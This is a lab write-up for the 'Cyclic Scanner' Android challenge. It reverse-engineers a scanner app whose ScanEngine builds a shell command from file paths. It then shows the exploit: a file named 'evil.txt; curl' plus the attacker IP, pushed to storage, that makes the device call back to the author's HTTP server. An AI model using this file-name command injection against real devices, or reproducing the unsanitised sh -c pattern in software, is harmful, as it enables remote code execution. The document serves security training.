Lab - Cyclic Scanner
Welcome to the Cyclic Scanner Challenge! This lab is designed to mimic real-world scenarios where vulnerabilities within Android services lead to exploitable situations. Participants will have the opportunity to exploit these vulnerabilities to achieve remote code execution (RCE) on an Android device.
- Exploit a vulnerability inherent within an Android service to achieve remote code execution.
Skills Required
- Mastery in reverse engineering Android applications.
- In-depth understanding of Android application architecture, especially Android services, and their inherent vulnerabilities.
The app uses a switch to start the scanner which is a foreground service
Let’s download vpn file and use adb to connect to the lab
0xbinder@archlinux ~> adb connect
connected to
Let’s locate the third party apps installed with adb
0xbinder@archlinux ~> adb shell pm list packages -3
Let’s get the path of the cyclicscanner app
0xbinder@archlinux ~> adb shell pm path com.mobilehackinglab.cyclicscanner
Let’s pull the app for static analysis with jadxgui
0xbinder@archlinux ~/D/mobile-hacking> adb pull /data/app/~~qM4I86KbSswb6BplSzhL0A==/com.mobilehackinglab.cyclicscanner-rtyKTMCcoKLT7WV1i1hWWA==/base.apk
In the AndroidManfest.xml
file the MainActivity
is exported and we have a ScanService
which is not exported.
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
The application also needs external storage permissions for reading and writing files across shared storage and a foreground service permission which perform operations that are noticeable to the user and must display a notification to the user.
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
In the MainActivity
we have setupSwitch
function that uses the switch to start ScanService.class
using an Intent
public static final void setupSwitch$lambda$3(MainActivity this$0, CompoundButton compoundButton, boolean isChecked) {
Intrinsics.checkNotNullParameter(this$0, "this$0");
if (isChecked) {
Toast.makeText(this$0, "Scan service started, your device will be scanned regularly.", 0).show();
this$0.startForegroundService(new Intent(this$0, (Class<?>) ScanService.class));
Toast.makeText(this$0, "Scan service cannot be stopped, this is for your own safety!", 0).show();
ActivityMainBinding activityMainBinding = this$0.binding;
if (activityMainBinding == null) {
activityMainBinding = null;
private final void startService() {
Toast.makeText(this, "Scan service started", 0).show();
startForegroundService(new Intent(this, (Class<?>) ScanService.class));
Further analyzing the ScanService
class the handleMessage
function will tranverse through all files and call ScanEngine.INSTANCE.scanFile(file)
to check is the files are infected or safe.
@Override // android.os.Handler
public void handleMessage(Message msg) {
Intrinsics.checkNotNullParameter(msg, "msg");
try {
System.out.println((Object) "starting file scan...");
File externalStorageDirectory = Environment.getExternalStorageDirectory();
Intrinsics.checkNotNullExpressionValue(externalStorageDirectory, "getExternalStorageDirectory(...)");
Sequence $this$forEach$iv = FilesKt.walk$default(externalStorageDirectory, null, 1, null);
for (Object element$iv : $this$forEach$iv) {
File file = (File) element$iv;
if (file.canRead() && file.isFile()) {
System.out.print((Object) (file.getAbsolutePath() + "..."));
boolean safe = ScanEngine.INSTANCE.scanFile(file);
System.out.println((Object) (safe ? "SAFE" : "INFECTED"));
System.out.println((Object) "finished file scan!");
} catch (InterruptedException e) {
Message $this$handleMessage_u24lambda_u241 = obtainMessage();
$this$handleMessage_u24lambda_u241.arg1 = msg.arg1;
sendMessageDelayed($this$handleMessage_u24lambda_u241, ScanService.SCAN_INTERVAL);
Looking at the ScanEngine
class we analyze the scanFile
that takes in a file
as a parameter. The file name is directly concatenated to the command
variable without any checks String command = "toybox sha1sum " + file.getAbsolutePath()
. This is a command injection
flaw. All we need to do is to create a file with a command name as the filename.
public final boolean scanFile(File file) {
Intrinsics.checkNotNullParameter(file, "file");
try {
String command = "toybox sha1sum " + file.getAbsolutePath();
Process process = new ProcessBuilder(new String[0]).command("sh", "-c", command).directory(Environment.getExternalStorageDirectory()).redirectErrorStream(true).start();
InputStream inputStream = process.getInputStream();
Intrinsics.checkNotNullExpressionValue(inputStream, "getInputStream(...)");
Reader inputStreamReader = new InputStreamReader(inputStream, Charsets.UTF_8);
BufferedReader bufferedReader = inputStreamReader instanceof BufferedReader ? (BufferedReader) inputStreamReader : new BufferedReader(inputStreamReader, 8192);
try {
BufferedReader reader = bufferedReader;
String output = reader.readLine();
Object fileHash = StringsKt.substringBefore$default(output, " ", (String) null, 2, (Object) null);
Unit unit = Unit.INSTANCE;
Closeable.closeFinally(bufferedReader, null);
return !ScanEngine.KNOWN_MALWARE_SAMPLES.containsValue(fileHash);
} finally {
} catch (Exception e) {
return false;
Let’s start a python server
0xbinder@archlinux ~/D/mobile-hacking [1]> sudo python -m http.server 80
Serving HTTP on port 8000 ( ...
Let’s check our ip with the following command
0xbinder@archlinux ~/D/mobile-hacking> ip a s tap0
Next we need to create a file and name it evil.txt; curl
with our tap0
Let’s create the file in our machine
0xbinder@archlinux ~/D/mobile-hacking> touch "evil.txt; curl"
Next we need to push it in the device storage
0xbinder@archlinux ~/D/mobile-hacking> adb push "evil.txt; curl" /storage/emulated/0/
Launching the scanner app we get this meaning the command injection worked successfully - - [03/Jul/2024 14:33:18] "GET / HTTP/1.1" 200 -